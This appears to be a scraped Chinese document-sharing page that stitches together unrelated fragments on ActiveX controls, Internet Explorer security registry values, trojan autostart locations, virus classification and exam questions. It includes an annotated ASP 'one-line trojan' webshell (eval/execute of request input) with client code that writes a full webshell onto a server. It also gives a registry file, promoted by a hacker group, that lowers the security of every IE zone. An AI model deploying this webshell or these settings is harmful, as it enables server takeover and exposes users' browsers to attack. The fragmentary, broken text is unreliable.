编程实现木马的ActiveX启动和注入IE的启动方式

合集下载

microsoft web browser activex使用方法

microsoftwebbrowseractivex使用方法**一、概述**ActiveX是一种由Microsoft开发的控件，可用于在Web浏览器中嵌入和执行各种应用程序。

它允许开发人员创建在Internet上运行的自定义应用程序，并提供了一个方便的集成方式。

ActiveX也广泛用于Microsoft的InternetExplorer浏览器中。

**二、安装和启用**要使用ActiveX，首先需要确认您的操作系统是否支持。

通常，大多数现代操作系统都内置了ActiveX的支持。

对于Windows操作系统，您可以按照以下步骤进行安装和启用：1.打开控制面板，并找到“程序和功能”选项。

2.在程序列表中找到并选中“InternetExplorer”，然后点击“打开或关闭Windows功能”。

3.在打开的窗口中，找到ActiveX控件和插件复选框，勾选它们以启用ActiveX。

4.确认更改并重启浏览器。

**三、使用方法**一旦ActiveX被启用，您就可以在Web浏览器中使用它了。

下面是一些基本的使用方法：1.打开InternetExplorer并访问一个包含ActiveX控件的网站。

2.通常，您不需要做任何特殊操作，因为ActiveX控件会自动在您的浏览器中加载并开始工作。

3.如果您需要更改ActiveX控件的设置或属性，通常可以在浏览器的工具栏中找到相关的选项或菜单项。

4.如果您遇到任何问题或错误，请尝试查看浏览器的错误报告或调试工具，以获取更多信息。

**四、注意事项**1.请注意，不是所有的网站都支持ActiveX控件。

一些网站可能会阻止或限制ActiveX的使用，以保护用户的安全和隐私。

2.某些ActiveX控件可能包含不安全的漏洞，因此请务必保持您的浏览器和操作系统更新到最新版本，以获得最佳的安全性。

3.避免在不信任或不安全的网站上加载和使用未知来源的ActiveX控件。

总的来说，MicrosoftWeb浏览器中的ActiveX使用相对简单和直观。

网络安全期末考试复习资料

网络安全期末考试复习资料网络安全复习资料1、下列不属于黑客攻击目的的是：（C）A、窃取信息B、获取口令C、给系统打补丁D、获取超级用户权限2、TCP/IP协议本身却具有很多的安全漏洞容易被黑客加以利用，但以下哪一层不会被黑客攻击（D）A、应用层B、传输层C、网际层D、都会被黑客攻击3. 攻击者通过外部计算机伪装成另一台合法机器来实现。

它能破坏两台机器间通信链路上的数据，其伪装的目的在于哄骗网络中的其它机器误将其攻击者作为合法机器加以接受，诱使其它机器向他发送据或允许它修改数据,此类型的攻击属于（B）？A.通过网络监听B.Ip地址欺骗C.口令攻击D.特洛伊木马4、下列不属于DDoS防范措施的是：（D）A、关闭不必要的服务。

B、限制同时打开的Syn半连接数目。

C、在网络防火墙上设置D、不安装DoS黑客工具5、下列不属于windows系统安全加固的方法是（B）A）安装最新的系统补丁B）打开帐号空连接C）删除管理共享D）激活系统的审计功能6、操作系统安全机制不包括（D）A）用户的登录B）文件和设备使用权限C）审计D）安装最新的系统补丁7、防范Windows操作系统中IPC＄攻击的方法不包括（D）A）关闭帐号的空连接B）删除管理共享C）指定安全口令D ）安装最新的系统补丁8、创建Web虚拟目录的用途是( C )。

A．用来模拟主目录的假文件夹B．用一个假的目录来避免感染病毒C．以一个固定的别名来指向实际的路径，当主目录改变时，相对用户而言是不变的D．以上都不对9、若系统存在Unicode漏洞，可采取补救办法不包括:（C）A限制网络用户访问和调用CMD命令的权限；B若没必要使用SCRIPTS和MSADC目录，将其全部删除或改名；C将IIS安装在主域控制器上D到Microsoft网站安装Unicode 漏洞补丁10、防范IE攻击的手段不包括（B）A、尽量避免访问一些不知名的网站B、控制网站访问次数C、预防恶意程序的运行D、利用杀毒软件11、MS SQL－SERVER空口令入侵无法实现的破坏是（B）A、将空口令服务器的数据库导出B、删除SA账号C、增加管理员D、格式化硬盘12、Access数据库下载漏洞防范措施不包括（A）A、在ASP程序中更改数据库连接方式为”DSN”B、设置复杂管理员口令，并MD5加密C、在数据库文件名前加一“＃“D、在IIS中，数据库上右键属性中，设置文件不可以读取13、针对后台是SQL_Server的数据库注入攻击实现不了的功能是（B）A、查询数据库B、下载数据库C、收集程序及服务器的信息D、绕过登陆验证14. 保证网络安全的最主要因素（C）。

IE浏览器安全选项的注册表键值,修改注册表启用Activex控件的脚本

;显示混合内容
; (3＝禁用、0＝启用、1＝提示)
"1609"=dword:00000000
;允许META REFRESH
; (3＝禁用、0＝启用)
"1608"=dword:00000000
;允许Microsoft网页浏览器控件的脚本
; (3＝禁用、0＝启用)
; IE6:允许Internet Exlorer Webbrowser控件的脚本
"2702"=dword:00000000
;允许Scriptlet
; (3＝禁用、0＝启用、1＝提示)
; XP+IE6不存在此项
"1209"=dword:00000000
;允许运行以前未使用的ActiveX控件而不提示
; (3＝禁用、0＝启用)
; XP+IE6不存在此项
"1208"=dword:00000000
; .NET Framework -开始
;--------------------------------------------------
; XAML浏览器应用程序
; (3＝禁用、0＝启用、1＝提示)
"2400"=dword:00000000
; XPS文档
; (3＝禁用、0＝启用、1＝提示)
"2401"=dword:00000000
;允许对剪贴板进行编程访问
; (3＝禁用、0＝启用、1＝提示)
; IE6:允许通过脚本进行粘贴操作
"1407"=dword:00000000
;允许网站使用脚本窗口提示获得信息
; (3＝禁用、0＝启用)

什么是ActiveX插件？

什么是ActiveX插件？自从Microsoft公司于1996年推出ActiveX技术以来, ActiveX技术已得到了许多软件公司的支持和响应, 并纷纷在其产品中融入ActiveX技术。

而作为ActiveX技术之一的ActiveX控件也得到了迅猛的发展, 不但各大软件公司推出了不少ActiveX 控件, ActiveX控件更是得到一般开发者的喜爱。

那么, 什么是ActiveX控件呢？ ActiveX控件是一个动态链接库, 是作为基于COM服务器进行操作的, 并且可以嵌入在包容器宿主应用程序中, ActiveX控件的前身就是OLE控件。

由于ActiveX控件与开发平台无关, 因此, 在一种编程语言上开发的ActiveX控件可以无须任何修改, 即可在另一种编程语言中使用, 其效果如同使用Windows通用控件一样。

如: 在VC++中开发的ActiveX控件, 不作任何修改即可应用于VB中。

由此可见, 通过使用ActiveX控件即可实现快速小型的组件重用、实现代码共享, 从而提升编程效率。

从上面亦可看出为何ActiveX控件如此广泛地受到开发者的欢迎。

因为ActiveX控件的可重用性, 加上Internet的普及, ActiveX控件得到了极大的发展, 目前, 从Internet上可以得到相当多的ActiveX控件, 而且品种繁多, 所完成的任务几乎无所不包。

对一般开发者来说, 只要有耐心, 都能从Internet上找到符合自己要求的ActiveX控件。

从Internet下载的ActiveX控件，或从其他途径得到的ActiveX控件，用户应该怎样做才能正确使用ActiveX控件或将其应用于自己的程序中呢？一般来说，一个外来ActiveX控件要在Windows中被正确使用，首先必必需将控件文件〔*.OCX〕复制到硬盘中，然后将其在Windows中注册，未在Windows中注册过的ActiveX控件是不能使用的。

Windows核心编程之ActiveX

2.1 ActiveX控件介绍ActiveX是在M$与JAVA抗争时产生的一个新名词（1996年3月），ActiveX 技术的前身是OLE技术是M$为了适应Internet的发展对OLE进行的扩展（当时的含义是“Activeate the Internet”），当时只是为了发展一种小型的可从网络上快速下载的可重用组件。

但是随着ActiveX技术的发展ActiveX很快成为了M$新的口号。

ActiveX由定义WEB页面到OLE控件的所有内容发展到定义一种可重用组件技术的规范。

现在ActiveX已经成为一种概念和潮流。

ActiveX的基础是OLE和COM，但是通过M$的各种开发工具可以屏蔽掉COM 模型中许多另人费解的技术细节。

本节主要讨论如何开发ActiveX控件，其实这只是AcitveX组件技术中的一部分。

ActiveX组件技术包括以下一些方面：∙自动化服务器∙自动化控制器∙控件∙COM对象∙文档∙容器现在的ActiveX控件等价与以前的OLE控件或OCX，一个典型的控件包括设计时和运行时的用户界面，唯一的IDispatch接口定义了控件的属性和方法，唯一的IConnectionPoint接口定义控件可引发的事件。

一个控件可以在容器中运行，所以从运行的角度看它类似与一个DLL。

由于在IE中添加了对控件的支持，所以你可以在WEB页面中通过VBScript对控件进行操纵。

此外COM组件间在二进制上兼容，当其中一个组件的代码被修改并且被重新编译连接后只要能够保持原来已经存在并被使用的接口不变化（可以添加其他接口）那么其他使用这个组件的文件都不需要重编译。

所以利用COM组件技术可以很大程度上的提高软件重用性。

同样如果在程序中使用了ActiveX控件那么你在以后升级程序时可以单独升级控件而不需要升级整个程序。

在提供灵活性的同时会带来性能上的牺牲，但和ActiveX为我们代码的好处上看来这些牺牲都算不了什么。

《计算机病毒》复习思考题及答案

《计算机病毒》复习思考题第一章计算机病毒概述1. 简述计算机病毒的定义和特征。

计算机病毒(Computer Virus)，是一种人为制造的、能够进行自我复制的、具有对计算机资源进行破坏作用的一组程序或指令集合。

计算机病毒的可执行性(程序性)、传染性、非授权性、隐蔽性、潜伏性、可触发性、破坏性、攻击的主动性、针对性、衍生性、寄生性(依附性)、不可预见性、诱惑欺骗性、持久性。

2. 计算机病毒有哪些分类方法？根据每种分类方法，试举出一到两个病毒。

3. 为什么同一个病毒会有多个不同的名称？如何通过病毒的名称识别病毒的类型？国际上对病毒命名的一般惯例为“前缀+病毒名+后缀”，即三元组命名规则。

1、系统病毒系统病毒的前缀为：Win32、PE、Win95、W32、W95等。

2、蠕虫病毒蠕虫病毒的前缀是：Worm。

3、木马病毒、黑客病毒木马病毒其前缀是：Trojan，黑客病毒前缀名一般为Hack 。

4、脚本病毒脚本病毒的前缀是：Script。

5、宏病毒其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。

宏病毒的前缀是：Macro。

6、后门病毒后门病毒的前缀是：Backdoor。

7、病毒种植程序病毒后门病毒的前缀是：Dropper。

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。

8．破坏性程序病毒破坏性程序病毒的前缀是：Harm。

这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。

9．玩笑病毒玩笑病毒的前缀是：Joke。

10．捆绑机病毒捆绑机病毒的前缀是：Binder。

4. 简述计算机病毒产生的背景。

5. 计算机病毒有哪些传播途径？传播途径有两种，一种是通过网络传播，一种是通过硬件设备传播（软盘、U盘、光盘、硬盘、存储卡等）。

网络传播，又分为因特网传播和局域网传播两种。

硬件设备传播：通过不可移动的计算机硬件设备传播、通过移动存储设备传播、通过无线设备传播。

web上用Activex控件开发步骤

HRESULT hr = S_OK ;
hr = CoCreateInstance(CLSID_StdComponentCategoriesMgr,
NULL, CLSCTX_INPROC_SERVER, IID_ICatRegister, (void**)&pcr);
// 标记控件初始化安全.
// 创建初始化安全组件种类
hr = CreateComponentCategory(CATID_SafeForInitializing,
L"Controls safely initializable from persistent data!");
if (SUCCEEDED(hr))
{
// Register this category as being "implemented" by the class.
CATID rgcatid[1] ;
rgcatid[0] = catid;
return ResultFromScode(SELFREG_E_TYPELIB);
if (!COleObjectFactoryEx::UpdateRegistryAll(FALSE))
return ResultFromScode(SELFREG_E_CLASS);
// CICCardApp::ExitInstance - DLL termination
int CICCardApp::ExitInstance()
{
return COleControlModule::ExitInstance();
}
//////////////////////////////////////////////////////////////////////

IE浏览器控件安装与设置(ActiveX插件)

电子商务WEB接入浏览器控件安装与设置浏览器设置1． Windows 7 操作系统中IE8的设置Windoews 7 操作系统本身自带的浏览器为IE8，下面介绍Windows7系统中的IE8在安装控件前的设置。

（1）取消弹出窗口阻止程序关闭弹出窗口阻止程序，工具→弹出窗口阻止程序→关闭弹出窗口阻止程序，如图0-1所示。

图0-1 弹出窗口阻止程序设置（2）可信任站点设置打开综合项目管理信息系统登陆地址(本说明中使用的是http://10.14.2.51:7001/pcpost ，具体请根据实现情况而定)，将其设置为可信任站点，（工具>>Internet选项>>安全>>可信任站点站点按钮），如图0-2所示图0-2 IE可信任站点设置可信任站点安全级别设置，点击图0-3所示的“自定义级别”按钮，；在弹出的窗口中把ActiveX各选项设置为“提示”或是“启动”即可，如图0-4所示（在图中应该有九项需要设置，视实际情况而定）。

图0-3 可信任站点安全级别设置图0-4 ActiveX控件设置（3）在高级选项中设置（Iternet 选项高级）把“启动内存保护减少联机攻击”的勾去掉，如所示。

图0-5 启动内存保护减少联机攻击操作界面注意：如果该选项前面的勾不允许取消，是灰色不可编辑状态时，请关闭浏览器，在桌面找到浏览器图标（C:\Program Files\Internet Explorer\iexplore.exe）右击浏览器选择“以管理员身份运行”，然后再去修改该选项即可。

图0-6 以管理员身份运行操作界面（4）兼容视图设置通过以上三步基本可以正常安装登陆控件了，如果还是显示不正常，请把登陆地址加入到兼容视图地址中(IE菜单下的工具选项)，然后单击“兼容性视图（V）”，分别如图0-7、图0-8所示和图1-9 所示。

图0-7 兼容性视图设置菜单选项图0-8 兼容性视图地址设置图0-9 兼容性视图2． Windows 7 操作系统中的IE8以下版本浏览器设置执行上面（Windows 7 操作系统中IE8的设置）的（1）、（2）即可3．其它Windows操作系统中IE8浏览器设置执行上面（Windows 7 操作系统中IE8的设置）的（1）、（2）、（4）即可。

三种方法解决IE已经阻止此站点以不安全的方式使用ActiveX控件

三种方法解决IE已经阻止此站点以不安全的方式使用ActiveX
控件
电脑出现IE已经阻止此站点以不安全的方式使用ActiveX控件，因此该网页无法正确显示”的处理办法"。

以下三类解决办法均尝试一下，直到可以为止。

方法1:.更改安全级别..打开IE.找到上方的工具-internet选项-安全,把那4个都设置下默认级别! 同时将工具-internet选项-隐私调为低
方法2：主菜单“工具”——Internet选项——安全——自定义级别，将“安全设置”中“对没有标记为安全的ActiveX”控件进行初始化和脚本运行由“禁用”改为“启用”
方法3：“工具” “Internet选项”“受信任的站点”“站点”，然后填入网址即可，如果这个网站不是以https:连接的把下面“对该区域中的所有站点要求服务器验证(https:)”前面的勾去掉即可。

IE允许ActiveX设置

设置ActiveX控件启用选项：（1）IE6.0版本的设置方法请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“internet”→“自定义级别”，然后将“ActiveX控件自动提示”、“标记为可安全执行脚本的ActiveX控件执行脚本”、“二进制脚本和行为”、“下载已签名控件”“运行ActiveX控件和插件”这五个选项选择为“启用”；将“对没有标记为安全的ActiveX控件进行初始化和脚本运行”、“下载未签名控件”选择为“提示”。

（2）IE7.0版本的设置方法请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“internet”→“自定义级别”，将“ActiveX”控件和插件相关设置进行如下调整：A、ActiveX控件自动提示：设置为“启用”；B、对标记为可安全执行脚本的ActiveX控件执行脚本：设置为“启用”；C、对未标记为可安全执行脚本的ActiveX控件初始化并执行脚本：设置为“提示”；D、二进制和脚本行为：设置为“启用”；E、下载未签名的ActiveX控件：设置为“提示”；F、下载已签名的ActiveX控件：设置为“提示”；G、允许scriptlet：默认原设置不做更改；H、允许运行以前未使用的ActiveX控件而不提示：设置为“禁用”；I、运行ActiveX控件和插件：设置为“启用”；J、在没有使用外部媒体播放机的网页上显示视频和动画：默认原设置不做更改；以上设置完成后点击“安全设置”窗口下方的“确定”键，返回到“Internet选项”中“安全”标签的页面，再次点击该页面下方的“确定”键，使更改完成。

（3）IE8.0版本的设置方法请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“internet”→“自定义级别”，将“ActiveX”控件和插件相关设置进行如下调整：A、ActiveX控件自动提示：启用B、对标记为可安全执行脚本的ActiveX控件执行脚本：启用C、对未标记为可安全执行脚本的ActiveX控件初始化并执行脚本：提示D、二进制和脚本行为：启用E、仅允许经过批准的域在未经提示的情况下使用ActiveX：启用F、下载未签名的ActiveX控件：提示G、下载已签名的ActiveX控件：提示H、允许scriptlet:默认原设置不更改I、允许运行以前未使用的ActiveX控件而不提示：禁用J、运行ActiveX控件和插件：启用K、在没有使用外部媒体播放机的网页上显示视频和动画：默认原设置不更改1、设置受信任站点请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“受信任的站点”→“站点”，在“站点”窗口打开后*.Y 。

病毒概述及病毒防护

18
黑客程序与特洛伊木马
黑客攻击的常用手段 1．包攻击。黑客可利用一些工具产生畸形或碎片数据包，这些数据包不能被计算机正确合成，从而导致系统崩溃。 2．服务型攻击。这种攻击通常是黑客向计算机发送大量经过伪装的数据包，使计算机疲于响应这些经过伪装的不可到达客户的请求，从而使计算机不能响应正常的客户请求，或使计算机误以为访问的主机不可到达，从而达到切断正常连接的目的。 3．缓冲区溢出攻击。这种攻击是向操作系统或应用程序发送超长字符串，由于程序本身设计的漏洞，未能对其进行有效的检验，导致程序在缓冲区溢出时意外出错甚至退出，使黑客获得到系统管理员的权限。 4．口令攻击。这种攻击一般是依据一个包含常用单词的字典文件、程序进行大量的猜测，直到猜对口令并获得访问权为止。它通常使用蛮力攻击方式。 19
中国联通成分维护人员培训－计算机及办公网络故障处理
病毒概述与病毒防护
1
局域网基础及病毒防护病毒--多层感染途径
3. 第三是通过软盘和盗版光盘传播病毒
NT Server
2. 第二是通过Internet 浏览、下载（HTTP、FTP）
Windows NT/2000
防火墙
Internet Email 网关
4
计算机病毒的概述
计算机病毒的产生原因（1）软件产品的脆弱性是产生计算机病毒根本的技术原因。（2）社会因素是产生计算机病毒的土壤。计算机病毒的传播途径计算机病毒主要是通过复制文件、发送文件、运行程序等操作传播的。通常有以下几种传播途径： 1．移动存储设备。包括软盘、硬盘、移动硬盘、光盘、磁带等。 2．网络。由于网络覆盖面广、速度快，为病毒的快速传播创造了条件。目前大多数新式病毒都是通过网络进行传播的，破坏性很大。

浏览器安全问题导致activex不能使用的终极解决办法

浏览器安全问题导致activex不能使⽤的终极解决办法不废话，直接说办法：1、将浏览器的internet选项中的internet和本机internet的安全设置中的对不安全的activex控件标记为可⽤设置启⽤。

2、将要访问的⽹址的域名加⼊信任站点，这点很重要。

3、你的activex控件最好事先在本机注册⼀下（可有可⽆）。

由于很多客户不懂怎么操作，所以写了⼀个注册表⽂件，只要⽤户执⾏⼀下这个⽂件就⾏，注册表内容如下：Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost] "http"=dword:00000002"https"=dword:00000002[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000中国红盟.因为专业所以信赖!中国红盟()：您⾝边的服务器.⽹站安全专家.。

关于木马病毒的六种启动方式

关于木马病毒的六种启动方式木马是随计算机或Windows的启动而启动并掌握一定的控制权的，其启动方式可谓多种多样，通过注册表启动、通过System.ini启动、通过某些特定程序启动等，真是防不胜防。

其实只要能够遏制住不让它启动，木马就没什么用了，这里就简单说说木马的启动方式，知己知彼百战不殆嘛。

一、通过"开始\程序\启动"隐蔽性:2星应用程度:较低这也是一种很常见的方式，很多正常的程序都用它，大家常用的QQ就是用这种方式实现自启动的，但木马却很少用它。

因为启动组的每人会会出现在“系统配置实用程序”(msconfig.exe，以下简称msconfig)中。

事实上，出现在“开始”菜单的“程序\启动”中足以引起菜鸟的注意，所以，相信不会有木马用这种启动方式。

二、通过Win.ini文件隐蔽性:3星应用程度:较低同启动组一样，这也是从Windows3.2开始就可以使用的方法，是从Win16遗传到Win32的。

在Windows3.2中，Win.ini就相当于Windows9x中的注册表，在该文件中的[Windows]域中的load和run项会在Windows启动时运行，这两个项目也会出现在msconfig中。

而且，在Windows98安装完成后这两项就会被Windows的程序使用了，也不很适合木马使用。

三、通过注册表启动1、通过HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run，HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServi ces隐蔽性:3.5星应用程度:极高应用案例:BO2000，GOP，NetSpy，IEthief，冰河……这是很多Windows程序都采用的方法，也是木马最常用的。

从浏览器启动客户端程序

从浏览器启动客户端程序∙综述现在有很多B/S与C/S相结合的产品，会出现一种需求：从浏览器启动客户端的程序，并且如果客户端未安装相应程序，先提示安装。

主流的几款产品：腾讯QQ、阿里旺旺、迅雷、PPLive等，都有实现了类似的功能。

浏览器启动客户端程序可以通过注册自定义的Url协议来实现，而检测客户端是否安装程序需要利用ActiveX控件。

要额外注意的是，现在只有IE浏览器才支持。

∙客户端程序先准备一个简单的客户端程序，只用来显示传入的命令行参数。

Client1namespace wuhong.Client2{3class Program4 {5static void Main(string[] args)6 {7if (args != null && args.Length > 0)8 {9 Array.ForEach(args, arg => Console.WriteLine(arg));10 }1112 Console.ReadLine();13 }14 }15}----------------------------精品word文档值得下载值得拥有----------------------------------------------从浏览器启动注册自定义的Url协议，这样当用户点击这个URL协议的链接后，IE就会启动相关URL协议的处理器，使用注册的程序来处理这个协议。

具体来说，比如现在需要注册“wuhong.client”的Url协议，使得形如“wuhong.client:XXXXYYYY”的链接都由上节的控制台程序来处理。

这一切只需要在客户端安装控制台程序的同时向注册表添加下面的项就可以实现：注册表1[HKEY_CLASSES_ROOT\wuhong.client]23@="wuhong.Client"45"URL Protocol"=""67[HKEY_CLASSES_ROOT\wuhong.client\DefaultIcon]89@=" wuhong.Client.exe "1011[HKEY_CLASSES_ROOT\wuhong.client\Shell]1213[HKEY_CLASSES_ROOT\wuhong.client\Shell\open]1415[HKEY_CLASSES_ROOT\wuhong.client\Shell\open\command]1617@="\"[TARGETDIR]wuhong.Client.exe\" \"%1\""解释一下其中几项：[HKEY_CLASSES_ROOT\wuhong.client]默认项和URL Protocol项的值都是设置一个名称。

【计算机系统安全】26恶意代码

使用TCP协议，服务端侦听，客户端连接。这是最简单，最早，最广泛使用的一种通讯方案。
使用工具可以很容易的发现在某一端口上侦听的进程，以及进程对应的可执行文件。
如果服务端装有防火墙，那么客户端发起的连接就会被防火墙拦截。
如果局域网内通过代理上网的电脑，因为本机没有独立的IP地址(只有局域网的IP地址)，所以也不能正常使用。
如RootKit、Hkdef、ByShell…
6. 拒绝服务程序，黑客工具，广告软件，间谍软件，恶意网页……
6
病毒发展史（续1）
引导区病毒
基于文件的病毒
邮件群发病毒
台式电脑
第1代网络病毒
台式电脑
LAN服务器
台式电脑台式电脑台式电脑
第2代
互联网防毒墙
电子邮件服务器墙
笔记本电脑
第3代
台式电脑
未修补漏洞的系统已修补漏洞的系统
WORM_SASSER.A
染毒电脑
被感染
不被感染
随机攻击
不被感染
被感染被感染
随机攻击
不被感染
Internet
随机攻击
不被感染
16
群发邮件型蠕虫
特点：种类、变种众多，是最常见的一类蠕虫病毒
求职信(I-Worm/Klez) 大无极(I-Worm/Sobig) 网络天空(I-Worm/Netsky) 雏鹰(I-Worm/BBEagle) 挪威客(I-Worm/MyDoom)
28
加载方式
开始菜单的启动项，基本上没有木马会用这种方式。在Winstart.bat中启动。在Autoexec.bat和Config.sys中加载运行。 win.ini/system.ini：有部分木马采用，不太隐蔽。注册表：隐蔽性强，多数木马采用。服务：隐蔽性强，多数木马采用。修改文件关联。

eval一句话木马原理详解

eval一句话木马原理详解eval一句话木马原理详解<%eval request("#")%>来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNA T属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: set iP=server.createObject("Adodb.Stream")iP.OpeniP.Type=2iP.CharSet="gb2312"iP.writetext request("aoyun")iP.SaveToFile server.mappath("aoyunwan.asp"),2iP.Closeset iP=nothingresponse.redirect "aoyunwan.asp"学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:set iP=server.createObject("Adodb.Stream")iP.OpeniP.Type=2iP.CharSet="gb2312"iP.writetext request("aoyun")iP.SaveToFile server.mappath("aoyunwan.asp"),2iP.Closeset iP=nothingresponse.redirect "aoyunwan.asp"学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了!不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件，因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件，如果该组件被禁用的话是不会写入成功的！二、还有就是权限的问题，如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的.============一句话木马"服务端就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp 为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为<%execute request("value")%> 其中value可以自己修改"一句话木马"客户端用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件一句话木马客户端源文件：里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了***********************************************************//"action="后面是需要修改的以asp命名的数据库的提交地址//这个标签的意思是建立一个表单以post方式提交给连接/doc/d916207664.html,/news/ebook/db/ebook .asp处理//这里的value值根据服务端<%execute request("value")%>中value而设定//可以自行修改成<%execute request("p")%>相应这里的value 值也必须改为pset lP=server.createObject("Adodb.Stream")//建立流对象，有了对象才可以使用它固有的属性和方法lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("joeving") //取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应lP.SaveToFile server.mappath("wei.asp"),2//将木马内容以覆盖文件的方式写入wei.asp//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp//但和下面的response.redirect"wei.asp"中wei.asp的保持一致lP.Close //关闭对象set lP=nothing //释放对象response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应，也就是你熟悉的asp木马登陆界面。

计算机木马病毒介绍

具有自动运行性
在系统启动时即跟随着启动，所以必须潜入在你的启动配置文件中如win.ini system.ini winstart.bat及启动组等文件中
包含具有未公开并且可能产生危险后果的功能的程序具备自动恢复功能
现在很多木马程序中的功能模块不再由单一的文件组成，而是具有多重备份，可以相互恢复
能自动打开特别的端口功能的特殊性
除普通的文件操作以外，有此木马具有搜索cache中的口令、设置口令、扫描目标机器的IP地址、进行键盘记录、远程注册表的操作以及锁定鼠标功能
木马病毒的判断
当你浏览一个网络，弹出一些广告窗口是很正常的事情，可是如果你根本没有打开浏览器，而浏览器突然自己打开，并且进入某个网站系统配置老是自动被更改，比如屏保显示的文字，时间和日期，声音大小，还有CDROM自动运行配置硬盘老没缘由的读盘，软驱灯经常自己亮起，网络连接及鼠标屏幕出现异常现象
自我销毁
打开含有木马的文件后，木马会将自己拷贝到WINDWOS的系统文件夹下源木马文件和系统文件夹中的木马文件大小是一样的，用户在近来收到的信件和下载的软件中找到源木马文件，根据大小去系统文件夹中找相同大小的文件，判断下哪个是木马就行了，而此种木马我自我销毁功能。在没查杀木马的工具帮助下，就很难删除木马了
键盘记录木马
记录受害者的键盘敲击并且在LOG文件里查找密码随着WINDOWS的启动而启动，有在线和离线记录选项，对于这种类型的木马，邮件发送功能也是必不可少的
木马的种类
DoS攻击木马
入侵一台计算机种上DoS攻击木马，此机成为日后DoS攻击的最得力助手控制的肉鸡数量越多，你发动DoS攻击取得的成功率就越大此类木马不体现在被感染的计算机，而是体现在攻击者可以利用它来攻击一台又一台计算机，给网络造成伤害和带来损失类似DoS的木马叫做邮件炸弹木马，一旦机器被感染，木马就会随机生成各种各样主题的信件，对特定的邮箱不停地发送邮件，一直到对方瘫痪，不能接受邮件为止

网页超链接调用本地exe程序

网页超链接调用本地exe程序由于项目需要将VC MFC做的视频监控程序嵌入到web页面里，因此才开始研究这方面，类似于我们点击了迅雷下载，那么系统默认就会启动迅雷程序一样。

按照微软的推荐，应该通过ActiveX，把可执行程序嵌入到网页中，但是我们要购买ActiveX签名，这种方式对于个人来讲并不合理。

最早的方式就是js调用，但是肯定不安全，因为这样做时木马病毒程序无法阻止，会给用户带来灾难性的后果，当然，IE6之后，微软就不再允许这种调用方式。

于是就想起平时网页的弹出框功能了，包括远程登录Telnet，淘宝的阿里旺旺等，于是就去分析实现的原理。

原来这些程序在注册表里都有对应的项，因此当点击时，就会默认执行这些程序。

到这里原理就很明白了，我们就可以把自己写好的程序打包成exe文件，然后把执行该exe程序的路径信息写进注册表，在网页超链接中，就可以利用（协议：//参数），exe接收该参数，然后执行。

具体步骤如下：1、启动注册表：很简单，win+r—>regedit，打开注册表2、建立自己的协议：在HKEY_CLASSES_ROOT下建立一个自己的协议名称（右键新建项），如Camera，Camera下继续创建两个项，分别为DefaultIcon 和shell，最后在shell下建立command项，此时自己的协议结构就是这样的，下面开始设置对应的值。

3、首先是Camera项，建立URL Protocol项，并设定默认时的数据其次是DefaultIcon项，设定数据为要执行的exe文件的全路径最后是command项，设定数据为exe文件全路径+参数，这里%1就是传递给exe的参数，exe文件接收该参数并执行，如果web网页中的超链接代码为调用远程监控，那么%1这个参数就是“Camera://调用远程监控”字符串。

关于参数，Camera://后面的字符串被看作参数，有两种，一种是0，表示完整执行路径，另一种是1，表示网页传过来的字符串。

WebScarab和TamperIE的使用-汤进冉

WebScarab和TamperIE的使用在测试XSS攻击(跨站攻击)防护时，我们常常通过修改报文相应的字段发起XSS 攻击进行测试。

